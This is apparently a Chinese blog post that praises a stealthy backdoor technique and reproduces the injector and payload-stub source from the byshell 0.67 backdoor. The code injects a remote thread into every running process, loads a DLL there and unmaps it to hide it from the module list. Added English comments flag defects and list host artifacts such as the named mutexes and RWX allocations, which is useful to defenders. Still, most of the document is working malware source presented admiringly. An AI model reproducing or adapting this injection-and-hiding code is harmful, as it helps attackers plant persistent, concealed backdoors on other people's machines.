一个不错的隐藏后门思路

一个不错的隐藏后门思路：利用远程线程把 DLL 注射到系统进程，随后解除 DLL 映射，删除自身的 DLL 和 EXE 文件以及自己创建的服务，仅存在于内存中。于是在寄主机器上找不到新增的服务项、磁盘文件或进程空间里的不明 DLL 模块（注意：注入进程里的代码本身以及下面代码创建的互斥体、事件、文件映射等命名对象仍然存在）。关机时，该程序会截获关机调用，在系统关闭之前恢复自己。缺点是非正常重启（断电、强制重启）之后后门消失。下面引用的代码只包含"注射 + 解除映射"这一部分，删除文件/服务和截获关机的代码不在其中。

以下代码引自 byshell 0.67，可以从 Xfocus 获取完整源代码（baiyuanfan 大侠的作品撒~）。一直没看过后门那些东西，今天别人提到，没想到有这么不错的东西……

// Injector half of the byshell 0.67 loader (injfunc below is the half that runs
// inside each target). Walks every process in a Toolhelp snapshot and starts a
// remote thread in it that loads ntboot.dll and then unmaps it again. Before the
// loop it creates the named mutexes/event/section that the other components of
// the tool rendezvous on (their consumers are not in this excerpt).
// No parameters, no return value. Failures are only reported through the
// MessageBox(0,0,0,0) calls and, when bydbg is defined, an int3 with the error
// code in eax.
//
// Host artifacts this function creates (what a responder can look for):
//   mutexes  "by067clean", "by067revive"
//   event    "by067check"
//   section  "by067filemapping" (1024 bytes, DACL opened to Everyone)
//   in every injected process: two private RWX allocations (sizeof(injapistr)
//   bytes and 20000 bytes) and a thread whose start address is inside the latter.
void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm;
//SE_DEBUG_NAME: enable the debug privilege so OpenProcess(PROCESS_ALL_ACCESS)
//also succeeds on processes owned by other accounts. None of the three calls is
//checked; without SeDebugPrivilege the later OpenProcess simply fails.
 HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
 LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
 AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
//retrieve pids from toolhelp32 (one-second delay first; reason not given here)
Sleep(1000);
//snapshot is never compared against INVALID_HANDLE_VALUE before use.
HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
//Named global objects. Their HANDLEs are cast to int and discarded, never
//closed -- presumably on purpose, since the named objects must outlive this
//function. (HANDLE->int truncates on 64-bit; this code is 32-bit only, see the
//__asm blocks below.)
ret=(int)CreateMutex(0,0,"by067clean");
if(!ret){MessageBox(0,0,0,0);goto err1;}
ret=(int)CreateMutex(0,0,"by067revive");
if(!ret){MessageBox(0,0,0,0);goto err1;}
ret=(int)CreateEvent(0,0,1,"by067check");//auto-reset, initial state = signaled (1)! keep it that way
if(!ret){MessageBox(0,0,0,0);goto err1;}
//1024-byte pagefile-backed section ((HANDLE)-1 == INVALID_HANDLE_VALUE).
fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");
if(!fm){MessageBox(0,0,0,0);goto err1;}
//The section's DACL has to grant everyone read/write access (presumably because
//the injected code may run under other accounts).
//Security note: GENERIC_ALL for "EVERYONE" also lets any local user read,
//overwrite or re-ACL the section. psd (from GetSecurityInfo) and pnewdacl (from
//SetEntriesInAcl) are never LocalFree'd, and GetSecurityInfo/SetEntriesInAcl
//results are not checked.
PACL pdacl;
PACL pnewdacl;
PSECURITY_DESCRIPTOR psd;
EXPLICIT_ACCESS ace;
int ret1;
GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);
ace.grfAccessPermissions=GENERIC_ALL;
ace.grfAccessMode=GRANT_ACCESS;
ace.grfInheritance=NO_INHERITANCE;
ace.Trustee.pMultipleTrustee=0;
ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;
ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;
ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;
ace.Trustee.ptstrName="EVERYONE";
SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);
ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);
if(ret1){goto err2;}
//char injexe[]="explorer.exe";//for dbg only process
//Process32First's result is discarded and the loop condition is Process32Next,
//so the first entry of the snapshot is never examined (and a failing
//Process32First goes unnoticed).
for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){
 //if(stricmp(processsnap.szExeFile,injexe)){continue;}
 //skip the lowest pids (idle/System)
 if(processsnap.th32ProcessID<10){continue;}
 //MAINPROC1/MAINPROC2 and the global injapistr are defined elsewhere in the
 //project; ismainthread tells the payload which kind of host it landed in.
 if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}
 else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}
 else{injapistr.ismainthread=0;}
 pid=processsnap.th32ProcessID;

//inj
//bInheritHandle is TRUE (1). prohandle is not checked: on failure a NULL handle
//flows into every call below and they all fail silently.
prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);
//Probe for the payload DLL's preferred base (injfunc tests the same constant).
//If 4 bytes are readable there the process is treated as already infected.
//Defect: this `continue` bypasses CloseHandle(prohandle), leaking one handle per
//already-infected process. ret receives the byte count here and is reused below.
if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;}
//already loaded byshell once? do nothing
DWORD WINAPI injfunc(LPVOID);
HMODULE hModule;LPVOID paramaddr;
//Resolve kernel32 exports in this process and hand the raw addresses to the
//payload; this relies on kernel32.dll being mapped at the same base in every
//process. myIsBadReadPtr is resolved but not used by injfunc below.
hModule=LoadLibrary("kernel32.dll");
injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");
injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");
injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");
injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");
injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");
injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");
//Parameter block and code copy are both allocated RWX in the target. None of
//the four results below is checked (ret is simply overwritten each time).
paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);
//20000 bytes starting at injfunc are copied -- far more than the function
//itself, so whatever follows it in the image goes along; a read past the end of
//the code section would fault here. NOTE(review): with MSVC incremental linking
//the name `injfunc` may resolve to a jump thunk rather than the body -- confirm
//the build settings.
void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);
//Thread start = the copy of injfunc, thread argument = the copy of injapistr.
//The returned thread HANDLE is cast to int and never closed.
ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);
if(!ret){int tmp=GetLastError();
//(this inner tmp shadows the outer one; debug builds only)
#ifdef bydbg
OutputDebugString("cannot infect process:see pid in edx,err code in eax\n");
__asm mov eax,tmp
__asm mov edx,pid
__asm int 3;
#endif
}
CloseHandle(prohandle);

}//end for


CloseHandle(snapshot);
return;

//Error exits. Neither path closes snapshot, which was created before the first
//goto above.
{
err1:
#ifdef bydbg
OutputDebugString("create global obj failed\n");
__asm int 3;
#endif
return;
}
{
err2:
#ifdef bydbg
OutputDebugString("cannot set DACL of section,see err code in eax\n");
__asm mov eax,ret1
__asm int 3;
#endif
return;
}
}


// Payload stub: the code injcode copies (20000 bytes from its start) into each
// target and runs via CreateRemoteThread. It executes inside the *target*
// process, so it must not reference anything from the injector's image: every
// external function is reached through the INJAPISTR block at paramaddr, and the
// two strings are assembled byte by byte below rather than written as literals
// (which would live in the injector's data section).
//
// Steps in the host:
//   1. LoadLibrary("ntboot.dll"); give up unless it mapped at 0x19850000
//      (injcode probes that same address to detect an already-infected process).
//   2. Resolve the export "CmdService".
//   3. Copy the DLLIMAGESIZE-byte image to a scratch buffer, FreeLibrary it (so
//      it disappears from the loader's module list), re-allocate the same range
//      with VirtualAlloc and copy the image back.
//   4. Call CmdService(ismainthread).
// Always returns 0. DLLIMAGESIZE and INJAPISTR are defined elsewhere.
DWORD WINAPI injfunc(LPVOID paramaddr){

char ntboot[16];char msgbox[16];
INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr; 
//Build "ntboot.dll" and "CmdService" on the stack one byte at a time.
//(The quotes show up as typographic ’ in this copy of the listing; the original
//must use ASCII ' or the block will not assemble.)
__asm{ 
mov ntboot,’n’
mov ntboot+1,’t’
mov ntboot+2,’b’
mov ntboot+3,’o’
mov ntboot+4,’o’
mov ntboot+5,’t’
mov ntboot+6,’.’
mov ntboot+7,’d’
mov ntboot+8,’l’
mov ntboot+9,’l’
mov ntboot+10,0

mov msgbox,’C’
mov msgbox+1,’m’
mov msgbox+2,’d’
mov msgbox+3,’S’
mov msgbox+4,’e’
mov msgbox+5,’r’
mov msgbox+6,’v’
mov msgbox+7,’i’
mov msgbox+8,’c’
mov msgbox+9,’e’
mov msgbox+10,0
}
HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);
//Only continue if the DLL landed at its preferred base; the relocation-free
//unmap/re-map below depends on that (a NULL return also ends up here).
if((int)hModule!=0x19850000){return 0;}//special case
DWORD (WINAPI *myCmdService)(LPVOID);
//Resolved before the image is unmapped; it stays valid only because the bytes
//are copied back to the same address below.
myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));

unsigned int memsize=0;//unused
//Unlink the module without losing its code: copy out, FreeLibrary, re-allocate
//the same range RWX, copy back. Neither VirtualAlloc result is checked -- a
//NULL here means memcpy targets address 0. The scratch buffer is only
//decommitted (MEM_DECOMMIT), its reservation stays.
//NOTE(review): memcpy is a CRT call; in the copied code it only works if the
//compiler expands it inline (intrinsic) -- confirm the build settings.
void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(tempdll,hModule,DLLIMAGESIZE);
pinjapistr->myFreeLibrary(hModule);
hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);
//
//ismainthread (0/1/2, set by injcode from the host exe name) is passed as the
//single pointer-sized argument.
myCmdService((void*)(pinjapistr->ismainthread));
return 0;

}
